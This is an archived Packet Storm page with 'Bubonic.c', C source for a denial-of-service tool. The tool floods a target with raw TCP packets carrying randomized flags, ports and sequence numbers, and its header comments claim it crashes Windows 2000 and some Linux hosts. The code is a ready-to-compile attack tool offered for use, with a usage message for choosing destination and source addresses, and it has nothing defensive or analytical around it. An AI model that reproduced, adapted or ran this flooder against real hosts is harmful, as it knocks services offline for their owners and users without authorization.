Bubonic.c is a denial of service tool that sends random TCP packets with random settings. Tested against Windows 2000 and RedHat Zoot.
2013c97c64a142d7b60cf7fb0c87cfb2051a655e1a6bbacda27c715de28a58c4/*
* Bubonic.c lame DoS against Windows 2000 machines
* and certain versions of Linux (worked against an Ultra5
* running Redhat Zoot. Should compile under anything.
* Randomly sends TCP packets with random settings, etc.
* Brings the load up causing the box to crash with
* error code:
* STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
* MUST_SUCCEED_POOL_EMPTY
* CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
* WEE MULTICODE... www.antioffline.com/daemonic.c
* shouts... hrmm fsck it why not...
* #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
* qwer7y, m3th, god-, tattooman, spikeman, and my wife.
* Can't forget security staff all over the place.
* Logs for the packets sent at www.antioffline.com/logged
* Windows2K screen shots at www.antioffline.com/loads.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int ip_hl:4,
ip_v:4;
u_char ip_tos;
u_short ip_len;
u_short ip_id;
u_short ip_off;
u_char ip_ttl;
u_char ip_p;
u_short ip_sum;
u_long saddr, daddr;
};
struct tcp_hdr {
u_short th_sport;
u_short th_dport;
u_long th_seq;
u_long th_syn;
u_int th_x2:4,
th_off:4;
u_char th_flags;
u_short th_win;
u_short th_sum;
u_short th_urp;
};
struct tcpopt_hdr {
u_char type;
u_char len;
u_short value;
};
struct pseudo_hdr {
u_long saddr, daddr;
u_char mbz, ptcl;
u_short tcpl;
};
struct packet {
struct ip/*_hdr*/ ip;
struct tcphdr tcp;
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;
void usage(char *progname)
{
fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
fprintf(stderr, "Ports are set to send and receive on port 179\n");
fprintf(stderr, "dst:\tDestination Address\n");
fprintf(stderr, "src:\tSource Address\n");
fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n");
fprintf(stderr, "num:\tpackets\n\n");
exit(1);
}
inline u_short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
u_long lookup(char *hostname)
{
struct hostent *hp;
if ((hp = gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
void flooder(void)
{
struct timespec ts;
int i;
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 100;
packet.ip.ip_hl = 5;
packet.ip.ip_v = 4;
packet.ip.ip_p = IPPROTO_TCP;
packet.ip.ip_tos = 0xc9;
packet.ip.ip_id = radd;
packet.ip.ip_len = FIX(sizeof(packet));
packet.ip.ip_off = random();
packet.ip.ip_ttl = 255;
packet.ip.ip_dst.s_addr = radd;
packet.tcp.th_flags = 0;
packet.tcp.th_win = 0;
packet.tcp.th_seq = random();
packet.tcp.th_ack = 0;
packet.tcp.th_off = 0;
packet.tcp.th_urp = 0;
packet.tcp.th_dport = random();
cksum.pseudo.daddr = sradd;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = random();
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = sradd;
s_in.sin_port = random();
for(i=0;;++i) {
if( !(i&31337) ) {
packet.tcp.th_sport = 80;
cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
packet.tcp.th_flags = random();
packet.tcp.th_ack = random();
}
else {
packet.tcp.th_flags = rand();
packet.tcp.th_ack = rand();
}
++packet.ip.ip_id;
/*++packet.tcp.th_sport*/;
++packet.tcp.th_seq;
if (!bgport)
s_in.sin_port = packet.tcp.th_dport = random();
packet.ip.ip_sum = 0;
packet.tcp.th_sum = 0;
cksum.tcp = packet.tcp;
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
}
}
int main(int argc, char *argv[])
{
int on = 1;
printf("Bubonic -- sil@antioffline.com\n\n");
if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (argc < 4)
usage(argv[0]);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)
{
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
printf("\nFinding host\n"); fflush(stdout);
radd = lookup(argv[1]);
bgport = atoi(argv[3]);
bgsize = atoi(argv[4]);
sradd = lookup(argv[2]);
printf("AntiOffline -- Putting the Hero in Heroin\n");
flooder();
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed